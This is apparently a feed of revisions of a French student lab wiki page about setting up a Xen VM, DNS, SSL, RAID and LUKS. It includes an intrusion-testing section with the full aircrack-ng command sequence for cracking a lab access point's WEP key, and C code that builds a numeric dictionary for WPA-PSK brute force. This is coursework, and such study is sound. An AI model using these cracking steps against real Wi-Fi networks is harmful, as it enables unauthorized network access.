Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54113</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54113"/>
				<updated>2020-11-30T16:01:07Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Sécurisation site web par certificat */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54110</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54110"/>
				<updated>2020-11-30T15:58:26Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54108</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54108"/>
				<updated>2020-11-30T15:56:20Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Sécurisation site web par certificat */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
